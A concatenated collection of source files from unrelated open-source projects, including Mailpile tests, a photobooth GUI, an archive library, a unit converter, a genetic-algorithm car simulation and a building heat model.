'api_methods': [],
'javascript_classes': [],
'css_files': []
}
for method in ('GET', 'POST', 'UPDATE', 'DELETE'):
for cmd in urlmap._api_commands(method, strict=True):
cmdinfo = {
"url": cmd.SYNOPSIS[2],
"method": method
}
if hasattr(cmd, 'HTTP_QUERY_VARS'):
cmdinfo["query_vars"] = cmd.HTTP_QUERY_VARS
if hasattr(cmd, 'HTTP_POST_VARS'):
cmdinfo["post_vars"] = cmd.HTTP_POST_VARS
if hasattr(cmd, 'HTTP_OPTIONAL_VARS'):
cmdinfo["optional_vars"] = cmd.OPTIONAL_VARS
res['api_methods'].append(cmdinfo)
created_js = []
for cls, filename in sorted(list(
config.plugins.get_js_classes().iteritems())):
try:
parts = cls.split('.')[:-1]
for i in range(1, len(parts)):
parent = '.'.join(parts[:i+1])
if parent not in created_js:
res['javascript_classes'].append({
'classname': parent,
'code': ''
})
created_js.append(parent)
with open(filename, 'rb') as fd:
res['javascript_classes'].append({
'classname': cls,
'code': fd.read().decode('utf-8')
})
created_js.append(cls)
except (OSError, IOError, UnicodeDecodeError):
self._ignore_exception()
for cls, filename in sorted(list(
config.plugins.get_css_files().iteritems())):
try:
with open(filename, 'rb') as fd:
res['css_files'].append({
'classname': cls,
'css': fd.read().decode('utf-8')
})
except (OSError, IOError, UnicodeDecodeError):
self._ignore_exception()
return self._success(_('Generated Javascript API'), result=res)
_plugins.register_commands(JsApi)
```
#### File: Mailpile/tests/test_crypto_policy.py
```python
from mailpile.vcard import MailpileVCard, VCardLine
from tests import MailPileUnittest
VCARD_CRYPTO_POLICY = 'X-MAILPILE-CRYPTO-POLICY'
class CryptoPolicyBaseTest(MailPileUnittest):
def setUp(self):
self.config.vcards.clear()
pass
def _add_vcard(self, full_name, email):
card = MailpileVCard(VCardLine(name='fn', value=full_name),
VCardLine(name='email', value=email))
self.config.vcards.index_vcard(card)
return card
class CryptoPolicyAutoSetAll(CryptoPolicyBaseTest):
def test_command_is_executable(self):
res = self.mp.crypto_policy_auto_set_all()
self.assertIsNotNone(res)
def test_vcard_gets_updated(self):
self._add_vcard('Signer', '<EMAIL>')
self._add_vcard('Encrypter', '<EMAIL>')
res = self.mp.crypto_policy_auto_set_all()
self.assertEqual({'<EMAIL>', '<EMAIL>'}, res.as_dict()['result'])
signer_vcard = self.config.vcards.get_vcard('<EMAIL>')
encrypter_vcard = self.config.vcards.get_vcard('<EMAIL>')
self.assertEqual('sign', signer_vcard.get(VCARD_CRYPTO_POLICY).value)
self.assertEqual('encrypt', encrypter_vcard.get(VCARD_CRYPTO_POLICY).value)
class UpdateCryptoPolicyForUserTest(CryptoPolicyBaseTest):
def test_args_are_checked(self):
self.assertEqual('error', self.mp.crypto_policy_set().as_dict()['status'])
self.assertEqual('error', self.mp.crypto_policy_set('one arg').as_dict()['status'])
def test_policies_are_validated(self):
self._add_vcard('Test', '<EMAIL>')
for policy in ['default', 'none', 'sign', 'encrypt']:
self.assertEqual('success', self.mp.crypto_policy_set('<EMAIL>', policy).as_dict()['status'])
for policy in ['anything', 'else']:
res = self.mp.crypto_policy_set('<EMAIL>', policy).as_dict()
self.assertEqual('error', res['status'])
self.assertEqual('Policy has to be one of none|sign|encrypt|sign-encrypt|default',
res['message'])
def test_vcard_has_to_exist(self):
res = self.mp.crypto_policy_set('<EMAIL>', 'sign').as_dict()
self.assertEqual('error', res['status'])
self.assertEqual('No vcard for email <EMAIL>!', res['message'])
def test_vcard_is_updated(self):
vcard = self._add_vcard('Test', '<EMAIL>')
for policy in ['none', 'sign', 'encrypt']:
self.mp.crypto_policy_set('<EMAIL>', policy)
self.assertEqual(policy, vcard.get(VCARD_CRYPTO_POLICY).value)
def test_default_policy_removes_vcard_line(self):
vcard = self._add_vcard('Test', '<EMAIL>')
vcard.add(VCardLine(name=VCARD_CRYPTO_POLICY, value='sign'))
self.mp.crypto_policy_set('<EMAIL>', 'default')
self.assertEqual(0, len(vcard.get_all(VCARD_CRYPTO_POLICY)))
class CryptoPolicyForUserTest(CryptoPolicyBaseTest):
def test_no_email_provided(self):
res = self.mp.crypto_policy().as_dict()
self.assertEqual('error', res['status'])
self.assertEqual('Please provide a single email address!', res['message'])
def test_no_msg_with_email_(self):
res = self.mp.crypto_policy('<EMAIL>').as_dict()
self.assertEqual('success', res['status'])
self.assertEqual('none', res['result'])
def test_with_signed_email(self):
res = self.mp.crypto_policy('<EMAIL>').as_dict()
self.assertEqual('success', res['status'])
self.assertEqual('sign', res['result'])
def test_with_encrypted_email(self):
res = self.mp.crypto_policy('<EMAIL>').as_dict()
self.assertEqual('success', res['status'])
self.assertEqual('encrypt', res['result'])
def test_vcard_overrides_mail_history(self):
vcard = self._add_vcard('Encrypter', '<EMAIL>')
vcard.add(VCardLine(name=VCARD_CRYPTO_POLICY, value='sign'))
res = self.mp.crypto_policy('<EMAIL>').as_dict()
self.assertEqual('success', res['status'])
self.assertEqual('sign', res['result'])
``` |
{
"source": "jocelyngate38/photobooth-software",
"score": 2
} |
#### File: jocelyngate38/photobooth-software/gif.py
```python
from PyQt5.QtCore import (QFile, QFileInfo, QPoint, QRect, QRectF, QSettings, QSize,
Qt, QTextStream, QThread, pyqtSignal, pyqtSlot, QTimer, QDateTime, QIODevice, QElapsedTimer)
from PyQt5.QtGui import QIcon, QKeySequence, QFont, QPixmap, QPainter, QPen, QColor, QMovie
from PyQt5.QtWidgets import (QMenu, QAction, QLabel, QApplication, QMainWindow)
import platform
if platform.system() == 'Windows':
EMULATE = True
else:
EMULATE = False
import RPi.GPIO as GPIO
import pyautogui
from random import randint
from random import randrange
from datetime import datetime
from ressourceManager import *
import threading, time, random, shutil, os, subprocess
import glob
import json
from subprocess import Popen, PIPE, check_output
from boothFilters import *
import uuid
from enum import Enum
class Label(QLabel):
ribbonEmptyRight = True
trayMissingRight = True
paperEmptyRight = True
ribbonEmptyLeft = True
trayMissingLeft = True
paperEmptyLeft = True
def setRibbonEmptyRight(self, b):
self.ribbonEmptyRight = b
def setPaperEmptyRight(self, b):
self.trayMissingRight = b
def setTrayMissingRight(self, b):
self.paperEmptyRight = b
def setRibbonEmptyLeft(self, b):
self.ribbonEmptyLeft = b
def setPaperEmptyLeft(self, b):
self.trayMissingLeft = b
def setTrayMissingLeft(self, b):
self.paperEmptyLeft = b
def __init__(self, parent=None):
super(Label, self).__init__(parent=parent)
def paintEvent(self, e):
iL = 0
jL = 0
iR = 1280-229
jR = 0
incw = 0
inch = 85
super().paintEvent(e)
qp = QPainter(self)
if self.ribbonEmptyLeft is True:
qp.drawPixmap(iL, jL, QPixmap("ribbonEmpty.png"))
iL = iL + incw
jL = jL + inch
if self.trayMissingLeft is True:
qp.drawPixmap(iL, jL, QPixmap("trayMissing.png"))
iL = iL + incw
jL = jL + inch
if self.paperEmptyLeft is True:
qp.drawPixmap(iL, jL, QPixmap("paperEmpty.png"))
if self.ribbonEmptyRight is True:
qp.drawPixmap(iR, jR, QPixmap("ribbonEmpty.png"))
iR = iR + incw
jR = jR + inch
if self.trayMissingRight is True:
qp.drawPixmap(iR, jR, QPixmap("trayMissing.png"))
iR = iR + incw
jR = jR + inch
if self.paperEmptyRight is True:
qp.drawPixmap(iR, jR, QPixmap("paperEmpty.png"))
class MainWindow(QMainWindow):
def __init__(self):
super(MainWindow, self).__init__()
self.movie = None
self.label = None
self.showFullScreen()
self.initGUI()
self.showHomePage()
QApplication.processEvents()
QApplication.processEvents()
def initGUI(self):
self.label = Label()
self.label.setFont(QFont("Right Chalk", 110, QFont.Bold))
self.label.setAlignment(Qt.AlignCenter)
self.label.setScaledContents(True)
self.label.setMinimumHeight(1024)
self.label.setMinimumWidth(1280)
self.label.setMaximumHeight(1024)
self.label.setMaximumWidth(1280)
self.setCentralWidget(self.label)
self.movie = QMovie("home.gif")
self.movie.setCacheMode(QMovie.CacheAll)
self.movie.loopCount()
def showHomePage(self):
# if self.trayMissing is True:
# if self.paperEmpty is True:
# if self.ribbonEmpty is True:
self.label.setMovie(self.movie)
self.movie.start()
QApplication.processEvents()
if __name__ == '__main__':
import sys
app = QApplication(sys.argv)
mainWin = MainWindow()
# sim = SimulatorButtonThread(mainWin, 1)
# sim.start()
mainWin.show()
ret = app.exec_()
sys.exit(ret)
``` |
{
"source": "JocelynHeckenkamp/Django-Duoboard",
"score": 2
} |
#### File: Django-Duoboard/duo/models.py
```python
from django.db import models
class User(models.Model):
username = models.CharField(max_length=255)
profile = models.CharField(max_length=255)
img = models.CharField(max_length=255)
streak = models.IntegerField(default=0)
xp = models.IntegerField(default=0)
lingots = models.IntegerField(default=0)
def __str__(self):
return self.username
class Username(models.Model):
username = models.CharField(max_length=255)
def __str__(self):
return self.username
``` |
{
"source": "jocelynj/PyEasyArchive",
"score": 3
} |
#### File: PyEasyArchive/dev/archive.py
```python
import sys
sys.path.insert(0, '..')
import os
import logging
def configure_logging():
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
# create console handler and set level to debug
ch = logging.StreamHandler()
# create formatter
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
# add formatter to ch
ch.setFormatter(formatter)
# add ch to logger
logger.addHandler(ch)
configure_logging()
os.environ['DYLD_LIBRARY_PATH'] = '/Users/dustin/build/libarchive/build/libarchive'
import libarchive.public
import libarchive.constants
#with libarchive.file_enumerator('test.7z') as e:
# for entry in e:
# print(entry)
#with open('test.7z', 'rb') as f:
# buffer_ = f.read()
# with libarchive.memory_enumerator(buffer_) as e:
# for entry in e:
# print(entry)
#with libarchive.file_reader('test.7z') as e:
# for entry in e:
# with open('/tmp/' + str(entry), 'wb') as f:
# for block in entry.get_blocks():
# f.write(block)
#with open('test.7z', 'rb') as f:
# buffer_ = f.read()
# with libarchive.memory_reader(buffer_) as e:
# for entry in e:
# with open('/tmp/' + str(entry), 'wb') as f:
# for block in entry.get_blocks():
# f.write(block)
def create_7z():
for entry in libarchive.public.create_file(
'create.7z',
libarchive.constants.ARCHIVE_FORMAT_7ZIP,
['/etc/profile']):
print("Adding: %s" % (entry))
#create_7z()
#with open('/tmp/new.7z', 'wb') as f:
# def writer(buffer_, length):
# f.write(buffer_)
# return length
#
# def opener():
# print("Opening.")
#
# def closer():
# print("Closing.")
#
# for entry in libarchive.create_generic(
# writer,
# open_cb=opener,
# close_cb=closer,
# format_name='7z',
# files=['/etc/profile']):
# print("Adding: %s" % (entry))
#libarchive.create_file('create.7z', '7z', ['/etc/profile'])
#libarchive.create_memory('7z', [])
def expand_deb_memory():
with open('/Users/dustin/Downloads/op-adam-665.deb', 'rb') as f:
buffer_ = f.read()
with libarchive.public.memory_reader(
buffer_,
# format_code=libarchive.constants.ARCHIVE_FORMAT_ZIP
) as e:
for entry in e:
path = '/tmp/deb/' + str(entry)
if not entry.filetype.IFDIR:
with open(path, 'wb') as f:
written = 0
for block in entry.get_blocks():
f.write(block)
written += len(block)
assert written == entry.size
elif os.path.exists(path) is False:
os.mkdir(path)
with open('/tmp/deb/data.tar.gz', 'rb') as f:
buffer_ = f.read()
with libarchive.public.memory_reader(
buffer_,
format_code=libarchive.constants.ARCHIVE_FORMAT_TAR_USTAR,
filter_code=libarchive.constants.ARCHIVE_FILTER_GZIP
) as e:
for entry in e:
# print(entry)
# print(entry.mtime)
path = '/tmp/data/' + str(entry)
if not entry.filetype.IFDIR:
with open(path, 'wb') as f:
written = 0
for block in entry.get_blocks():
f.write(block)
written += len(block)
assert written == entry.size
elif os.path.exists(path) is False:
os.mkdir(path)
expand_deb_memory()
def expand_deb_file():
with libarchive.public.file_reader('/Users/dustin/Downloads/op-adam-665.deb') as e:
for entry in e:
with open('/tmp/deb/' + str(entry), 'wb') as f:
for block in entry.get_blocks():
f.write(block)
with libarchive.public.file_reader('/tmp/deb/data.tar.gz') as e:
for entry in e:
path = '/tmp/data/' + str(entry)
if not entry.filetype.IFDIR:
with open(path, 'wb') as f:
written = 0
for block in entry.get_blocks():
f.write(block)
written += len(block)
assert written == entry.size
elif os.path.exists(path) is False:
os.mkdir(path)
#expand_deb_file()
def pour_deb_file():
os.chdir('/tmp/deb')
for e in libarchive.public.file_pour('/Users/dustin/Downloads/op-adam-665.deb'):
#print(e)
pass
#print('')
os.chdir('/tmp/data')
for e in libarchive.public.file_pour('/tmp/deb/data.tar.gz'):
#print(e)
pass
#pour_deb_file()
def pour_deb_memory():
os.chdir('/tmp/deb')
with open('/Users/dustin/Downloads/op-adam-665.deb', 'rb') as f:
for e in libarchive.public.memory_pour(f.read()):
#print(e.filetype)
pass
#print('')
os.chdir('/tmp/data')
with open('/tmp/deb/data.tar.gz', 'rb') as f:
for e in libarchive.public.memory_pour(f.read()):
#print(e)
pass
#pour_deb_memory()
```
#### File: PyEasyArchive/libarchive/library.py
```python
import logging
import os
import ctypes
import ctypes.util
_LOGGER = logging.getLogger(__name__)
_LIBRARY_NAME = 'archive'
_LIBRARY_FILENAME = 'libarchive.so'
def find_and_load_library():
search_filepaths = []
# Search for the library using our own environment variable.
filepath = os.environ.get('LA_LIBRARY_FILEPATH', '')
if filepath != '':
search_filepaths.append(filepath)
# Search for the library using the well-defined system library search-path.
_SEARCH_PATH = os.environ.get('LD_LIBRARY_PATH', '')
if _SEARCH_PATH != '':
for path in _SEARCH_PATH.split(":"):
filepath = os.path.join(path, _LIBRARY_FILENAME)
search_filepaths.append(filepath)
# Load the first one available.
found_filepath = None
for filepath in search_filepaths:
if os.path.exists(filepath) is True:
return filepath
# Search for our library using whatever search-path ctypes uses (not the same
# as `LD_LIBRARY_PATH`).
filepath = ctypes.util.find_library(_LIBRARY_NAME)
if filepath is not None:
return filepath
# Fallback on the naively trying to load the filename.
_LOGGER.debug("Using default library file-path: [%s]", _LIBRARY_FILENAME)
return _LIBRARY_FILENAME
_FILEPATH = find_and_load_library()
_LOGGER.debug("Using library file-path: [%s]", _FILEPATH)
libarchive = ctypes.cdll.LoadLibrary(_FILEPATH)
```
#### File: tests/adapters/test_archive_write.py
```python
import unittest
import os
import shutil
import contextlib
import tempfile
import libarchive.adapters.archive_write
import libarchive.adapters.archive_read
import libarchive.constants
import libarchive.test_support
_APP_PATH = os.path.join(os.path.dirname(os.path.abspath(__file__)), '..', '..')
# TODO(dustin): Add tests for file and memory pouring.
class TestArchiveWrite(unittest.TestCase):
def test_create_file(self):
with libarchive.test_support.chdir(_APP_PATH):
temp_path = tempfile.mkdtemp()
output_filename = 'archive.7z'
output_filepath = os.path.join(temp_path, output_filename)
try:
files = [
'libarchive/resources/README.md',
'libarchive/resources/requirements.txt',
]
libarchive.adapters.archive_write.create_file(
output_filepath,
libarchive.constants.ARCHIVE_FORMAT_TAR,
files,
filter_code=libarchive.constants.ARCHIVE_FILTER_BZIP2)
assert \
os.path.exists(output_filepath) is True, \
"Test archive was not created correctly."
with libarchive.adapters.archive_read.file_enumerator(output_filepath) as e:
actual = [entry.pathname for entry in e]
finally:
try:
shutil.rmtree(temp_path)
except:
pass
expected = [
'libarchive/resources/README.md',
'libarchive/resources/requirements.txt',
]
self.assertEquals(actual, expected)
def test_create_file__unicode(self):
with libarchive.test_support.chdir(_APP_PATH):
temp_path = tempfile.mkdtemp()
output_filename = 'archive.7z'
output_filepath = os.path.join(temp_path, output_filename)
# Also, write a source file with a unicode name that we can add to
# test internation support.
unicode_test_filepath = \
os.path.join(
temp_path,
"\u0905\u0906\u0907\u0536\u0537\u0538\u0539\u053a\u053b\uac12\uac13\uac14\uac15\uac16")
with open(unicode_test_filepath, 'w') as f:
f.write("test data \uf91f\uf920\uf921\uf922\uf923\uf924\uf925")
try:
files = [
'libarchive/resources/README.md',
'libarchive/resources/requirements.txt',
unicode_test_filepath,
]
libarchive.adapters.archive_write.create_file(
output_filepath,
libarchive.constants.ARCHIVE_FORMAT_TAR,
files,
filter_code=libarchive.constants.ARCHIVE_FILTER_BZIP2)
assert \
os.path.exists(output_filepath) is True, \
"Test archive was not created correctly."
with libarchive.adapters.archive_read.file_enumerator(output_filepath) as e:
actual = [entry.pathname for entry in e]
finally:
try:
shutil.rmtree(temp_path)
except:
pass
expected = [
'libarchive/resources/README.md',
'libarchive/resources/requirements.txt',
unicode_test_filepath.lstrip(os.sep),
]
self.assertEquals(actual, expected)
``` |
{
"source": "jocelynlopez/unit_converter",
"score": 4
} |
#### File: unit_converter/unit_converter/converter.py
```python
from decimal import Decimal as D
from unit_converter.parser import QuantityParser, UnitParser
def convert(quantity: str, desired_unit: str) -> D:
"""
:param quantity:
:param desired_unit:
:return:
Examples :
----------
>>> from unit_converter import convert
>>> convert('2.78 daN*mm^2', 'mN*µm^2')
Decimal('2.78E+10')
"""
quantity = QuantityParser().parse(quantity)
desired_unit = UnitParser().parse(desired_unit)
return quantity.convert(desired_unit).value
def converts(quantity: str, desired_unit: str) -> str:
"""
:param quantity:
:param desired_unit:
:return:
Examples :
----------
>>> from unit_converter import convert
>>> convert('2.78 daN*mm^2', 'mN*µm^2')
Decimal('2.78E+10')
"""
return str(convert(quantity, desired_unit))
if __name__ == "__main__":
import doctest
doctest.testmod()
```
#### File: unit_converter/unit_converter/parser.py
```python
import re
from decimal import Decimal as D
from functools import reduce
from unit_converter.data import PREFIXES, UNITS
from unit_converter.exceptions import UnitDoesntExistError
from unit_converter.units import Unit, Quantity
def parse(quantity: str) -> Quantity:
return QuantityParser().parse(quantity)
class QuantityParser(object):
quantity_re = re.compile("(?P<value>\d+[.,]?\d*)? *(?P<unit>.*)")
def parse(self, quantity: str) -> Quantity:
r = self.quantity_re.match(quantity)
unit = UnitParser().parse(r.group("unit"))
if r.group("value") is not None:
if ',' in r.group("value"):
value = D(r.group("value").replace(',', '.'))
else:
value = D(r.group("value"))
return Quantity(value, unit)
else:
return unit
class UnitParser(object):
unit_re = re.compile("(?P<unit>[a-zA-Z°Ωµ]+)\^?(?P<pow>[-+]?[0-9]*\.?[0-9]*)")
def parse(self, unit: str) -> Unit:
l_unit_s = self.unit_re.findall(unit)
l_unit = [self._parse_unit(unit, power) for unit, power in l_unit_s]
return reduce(lambda x, y: x * y, l_unit)
def _parse_unit(self, unit: str, power: str) -> Unit:
if power is '':
return self._parse_simple_unit(unit)
else:
return self._parse_simple_unit(unit) ** float(power)
@staticmethod
def _parse_simple_unit(unit_s: str) -> Unit:
"""Parse a simple unit.
In other word, parse an unit without a power value.
"""
unit = None
for prefix in PREFIXES.keys():
if unit_s.startswith(prefix) and unit_s[len(prefix):] in UNITS.keys():
unit = UNITS[unit_s[len(prefix):]]
prefix = PREFIXES[prefix]
break
if unit is None:
raise UnitDoesntExistError(unit_s)
return prefix*unit
``` |
{
"source": "jocelynshen/6.08-COVID-Load-Balancer",
"score": 3
} |
#### File: jocelynshen/6.08-COVID-Load-Balancer/updateCovidStatus.py
```python
import json
import sqlite3
import datetime
import requests
import string
import time
visits_db = '__HOME__/locations.db'
def request_handler(request):
if (request['method']=='POST'):
if 'user' in request['form'] and 'password' in request['form'] and 'confirmed' in request['form']:
user = str(request['form']['user'])
confirmed_state = str(request['form']['confirmed'])
time_now = datetime.datetime.now()
conn = sqlite3.connect(visits_db) # connect to that database (will create if it doesn't already exist)
c = conn.cursor() # move cursor into database (allows us to execute commands)
two_weeks_ago = time_now- datetime.timedelta(days = 14)
c.execute('''DELETE FROM locations_table WHERE time < ?;''', (two_weeks_ago,))
if (confirmed_state == 'true'):
sql = ''' UPDATE locations_table
SET con = 1
WHERE username = ?'''
c.execute(sql,(user,))
elif (confirmed_state == 'false'):
sql = ''' UPDATE locations_table
SET con = 0
WHERE username = ?'''
c.execute(sql,(user,))
conn.commit() # commit commands
conn.close() # close connection to database
return "COVID state changed for "+user
return "Invalid Request"
``` |
{
"source": "jocelynthiojaya/Self-Learning-Cars",
"score": 3
} |
#### File: Self-Learning-Cars/carbrain/geneticAlgorithm.py
```python
import random
import numpy as np
class geneticAlgorithm:
def __init__(self, parents1, parents2):
self.parents1 = parents1
self.parents2 = parents2
self.child1 = []
self.child2 = []
def crossover(self, alt=False):
""" Crossover genetic function. alt is for alternative random splicing """
if len(self.parents1) == len(self.parents2):
#check the size of the parents.
#get the size of parents
sizeParents = len(self.parents1)
if alt:
#generate random numbers to slice the parents into several parts.
slice_parents = random.randint(2, sizeParents-1)
#determine the crossover point. Generate random number to determine the bound for crossover point
crossover_array = np.array([random.randint(1,(sizeParents-1)) for _ in range(slice_parents)])
crossover_array.sort()
#remove duplicate numbers
crossover_array = list(dict.fromkeys(crossover_array))
#count the number of slices again.
slice_parents = len(crossover_array)
#do the crossover
for i in range(slice_parents):
bounds_top = crossover_array[i]
#print(bounds_top)
bounds_low = crossover_array[i-1]
if len(self.child1) == 0 :
self.child1 = np.concatenate([self.child1, self.parents1[0:bounds_top]])
self.child2 = np.concatenate([self.child2, self.parents2[0:bounds_top]])
flag_parents = 1
# if the flag is 1, it will take the value from parents 2 for child 1 and parents 1 for child 2
elif flag_parents == 1:
self.child1 = np.concatenate([self.child1, self.parents2[bounds_low:bounds_top]])
self.child2 = np.concatenate([self.child2, self.parents1[bounds_low:bounds_top]])
flag_parents = 0
# if the flag is 0, it will take the value from parents 1 for child 1 and parents 2 for child 2
elif flag_parents == 0 and len(self.child1) != 0:
self.child1 = np.concatenate([self.child1, self.parents1[bounds_low:bounds_top]])
self.child2 = np.concatenate([self.child2, self.parents2[bounds_low:bounds_top]])
flag_parents = 1
#ini buat yg belakangnya.
if flag_parents == 0:
self.child1 = np.concatenate([self.child1, self.parents1[bounds_top:]])
self.child2 = np.concatenate([self.child2, self.parents2[bounds_top:]])
elif flag_parents == 1:
self.child1 = np.concatenate([self.child1, self.parents2[bounds_top:]])
self.child2 = np.concatenate([self.child2, self.parents1[bounds_top:]])
else:
crossover_point = random.randint(1,(sizeParents - 1))
self.child1 = list(np.concatenate([self.parents1[0:crossover_point], self.parents2[crossover_point:]]))
self.child2 = list(np.concatenate([self.parents2[0:crossover_point], self.parents1[crossover_point:]]))
return self.child1, self.child2
def mutation(self, percentage=0.1, alt=False):
""" Percentage dictates how many value will be mutated. (0.0-1.0) """
self.crossover(alt)
#generate the random numbers to find the gene that we want to swap.
for _ in range(int(38*percentage)):
random_numbers = random.randint(0,37)
self.child1[random_numbers] = random.random()
self.child2[random_numbers] = random.random()
return self.child1, self.child2
# parents1 = np.array([1 for _ in range(38)])
# parents2 = np.array([0 for _ in range(38)])
# #print("parents1 = " , parents1)
# #print("parents2 = " , parents2)
# g1 = geneticAlgorithm(parents1,parents2)
# print(list(g1.mutation()[1]))
```
#### File: Self-Learning-Cars/cargame/camera.py
```python
import arcade
from cargame.globals import conf
from cargame import util
# This math is for getting the ratio from zoom. I honestly
# don't know what it is called, i just constructed it by hand
# Long form is 1 - (x - 1) / 2
zoom_multiplexer = lambda x : (3 - x)/2
# TODO: Implement anchor
class Camera:
def __init__(self, left_bound, bottom_bound, right_bound, top_bound):
""" Set every camera variables
s_width: Screen width
s_height: Screen height
"""
self.x = 0
self.y = 0
self.right = conf["screen_width"]
self.top = conf["screen_height"]
# Camera bounds
self.left_bound = left_bound
self.bottom_bound = bottom_bound
self.right_bound = right_bound
self.top_bound = top_bound
# The zoom of the main canvas
self.zoom = 1
# Whether zoom is enabled.
self.can_zoom = True
# Marker when camera port will be updated this frame
self.moved = False
def on_start_update(self):
""" Will be run at the beginning of them main update function """
self.moved = False
def handle_border(self):
""" Handles if the camera went out of bounds """
bound_left = self.x < self.left_bound
bound_right = self.right > self.right_bound
if bound_left or bound_right:
x_diff = self.left_bound - self.x if bound_left else self.right_bound - self.right
self.x += x_diff
self.right += x_diff
bound_bot = self.y < self.bottom_bound
bound_top = self.top > self.top_bound
if bound_bot or bound_top:
y_diff = self.bottom_bound - self.y if bound_bot else self.top_bound - self.top
self.y += y_diff
self.top += y_diff
def update_camera_pos(self, x=None, y=None, zoom=None):
"""
Updates the position according to the x, y, and zoom
"""
# Mark camera as moved this frame
self.moved = True
# Move and do maths
zoom_mult = zoom_multiplexer(self.zoom)
if x != None:
self.right = x + conf["screen_width"] * zoom_mult
self.x = x
if y != None:
self.top = y + conf["screen_height"] * zoom_mult
self.y = y
self.handle_border()
# print("Port size: ({}, {}) zoom: {}".format(self.right - self.x, self.top - self.y, self.zoom))
def update_zoom(self, zoom, anchor_x, anchor_y):
""" Updates the zoom of the main canvas """
# Check first whether zoom is enabled
if not self.can_zoom: return
# Mark camera as moved
self.moved = True
# Clamp the zoom
zoom = util.clamp(zoom, -5.0, 2.95)
# Calculate zoom increment
zoom_inc = self.zoom - zoom
# Get the linear interpolation so that the zoom is
# focused on the anchor
x_lerp = util.invlerp(0, conf["screen_width"], anchor_x)
y_lerp = util.invlerp(0, conf["screen_height"], anchor_y)
# print("x: {} y: {} right: {} top: {}".format(self.x, self.y, self.right, self.top))
# print("xlerp: {} ylerp: {}".format(x_lerp, y_lerp))
# Camera view ports
lp = self.x - (x_lerp * conf["screen_width"] * zoom_inc) / 2
bp = self.y - (y_lerp * conf["screen_height"] * zoom_inc) / 2
rp = self.right + ((1-x_lerp) * conf["screen_width"] * zoom_inc) / 2
tp = self.top + ((1-y_lerp) * conf["screen_height"] * zoom_inc) / 2
# If camera view port is within the bounds, do the zoom.
if (rp - lp) < (self.right_bound - self.left_bound) and (tp - bp) < (self.top_bound - self.bottom_bound):
# Calculate the camera maths here
self.x = lp
self.y = bp
self.right = rp
self.top = tp
self.zoom = round(zoom, 3)
self.handle_border()
# print("x: {} y: {} right: {} top: {}".format(self.x, self.y, self.right, self.top))
# print("Port size: ({}, {}) zoom: {}".format(self.right - self.x, self.top - self.y, self.zoom))
def move_camera_pos(self, dx, dy):
""" Moves the camera by appending the variables to
the individual coordinates.
"""
self.update_camera_pos(self.x + dx, self.y + dy)
def update_viewport(self):
""" Updates the camera by updating
the viewport of arcade
"""
arcade.set_viewport(self.x, self.right, self.y, self.top)
def handle_pan(self, dx, dy):
""" Handles the camera pan from data gotten from
mouse drag """
# Here, we adjust the pan speed according to the level of zoom too.
zoom_mult = zoom_multiplexer(self.zoom)
self.move_camera_pos(-dx * zoom_mult, -dy * zoom_mult)
def handle_zoom(self, mouse_x, mouse_y, scroll_y):
""" Handles the camera scroll from data gotten from
mouse scroll """
# Must adjust according to where the pointer is.
self.update_zoom(self.zoom + scroll_y * 0.05, mouse_x, mouse_y)
def get_viewport(self):
""" Gets the size of the viewport """
return (self.right - self.x, self.top - self.y)
def reset_zoom(self):
""" Reset the zoom of the camera to 1x """
self.update_zoom(1, conf["screen_width"]/2, conf["screen_height"]/2)
def set_can_zoom(self, state):
self.can_zoom = state
class Grid():
grid_size = 128
def __init__(self, camera):
"""
Detects the camera movement
"""
self.grid_lines = []
self.camera: Camera = camera
self.recreate_grid()
def update(self):
""" Update """
def recreate_grid(self):
""" Recreate the grid from the ground up
This will recreate the grids with an offset based on the camera position.
Therefore, grids will be only drawn in the place of the camera, not outside."""
# Reset the grid lines
self.grid_lines = []
# Recreate the vertical lines
viewport = self.camera.get_viewport()
for i in range(int(viewport[0]) // Grid.grid_size + 2):
self.grid_lines.append([self.camera.x + Grid.grid_size * i - (self.camera.x % Grid.grid_size), self.camera.y + -Grid.grid_size])
self.grid_lines.append([self.camera.x + Grid.grid_size * i - (self.camera.x % Grid.grid_size), self.camera.y + viewport[1] + Grid.grid_size])
# Horizontal lines
for i in range(int(viewport[1]) // Grid.grid_size + 2):
self.grid_lines.append([self.camera.x + -Grid.grid_size, self.camera.y + Grid.grid_size * i - (self.camera.y % Grid.grid_size)])
self.grid_lines.append([self.camera.x + viewport[0] + Grid.grid_size, self.camera.y + Grid.grid_size * i - (self.camera.y % Grid.grid_size)])
def draw_grid(self):
""" Draws the grid based on the configuration """
# Only update grid when camera is moved.
if self.camera.moved:
# Recreate every line grid
self.recreate_grid()
arcade.draw_lines(self.grid_lines, (235, 235, 235))
``` |
{
"source": "Jocelyn-Ting/1020-energy-efficient-building-jt-rm",
"score": 3
} |
#### File: 1020-energy-efficient-building-jt-rm/python code/Building.py
```python
import numpy as np
from scipy import integrate
from Outside import Outside
from Ground import Ground
from Room import Room
from Heater import Heater
from Cooler import Cooler
class Building:
#BUILDING Models the thermodynamics of a building
# Includes a list of Room objects, Heater, and Cooler
def __init__(self,L,W):
self.rooms=[] # List of room objects
self.heater=None # Heater object
self.cooler=None # Cooler object
self.L =L
self.W=W
self.t =1 #Current time stamp (days)
self.outside = Outside()
self.ground = Ground()
#self.T # vector of temperature of each room at current time step
@property
def T(self):
return [room.T for room in self.rooms]
#^i bet this is where a bug will happen. not sure if will work
def dTdt(self,t,T):
dTdt = []
#print(t)
for roomidx in range(0,len(self.rooms)):
room = self.rooms[roomidx]
roomdTdt = room.dTdt(t,T)
dTdt.append(roomdTdt)
return dTdt
def addRoom(self,ID,TRange,L,W):
newRoom = Room(ID,TRange,L,W,self)
self.rooms.append(newRoom)
def addHeater(self,Trange,fMax,building):
self.heater = Heater(Trange,fMax,building)
def addCooler(self,Trange,fMax,building):
self.cooler = Cooler(Trange,fMax,building)
def addInteriorWall(self,room1ID,room2ID,A_w,R_eff):
#Adds a wall between two rooms, with surface area of the wall
#equal to A_w, and the effective resistance of the wall as
#R_eff
room1 = next((room for room in self.rooms if room.ID == room1ID),None)
room2 = next((room for room in self.rooms if room.ID == room2ID),None)
room1.addWall(room2,A_w,R_eff)
room2.addWall(room1,A_w,R_eff)
def addExteriorWall(self,roomID,A_w,R_eff):
#Adds a wall separating outside from inside
room = next((room for room in self.rooms if room.ID == roomID),None)
room.addWall(self.outside,A_w,R_eff)
def addRoof(self,roomID,A_r,R_eff):
room = next((room for room in self.rooms if room.ID == roomID),None)
room.addRoof(self.outside,A_r,R_eff)
def addFloor(self,roomID,A_f,R_eff):
room = next((room for room in self.rooms if room.ID == roomID),None)
room.addFloor(self.ground,A_f,R_eff)
```
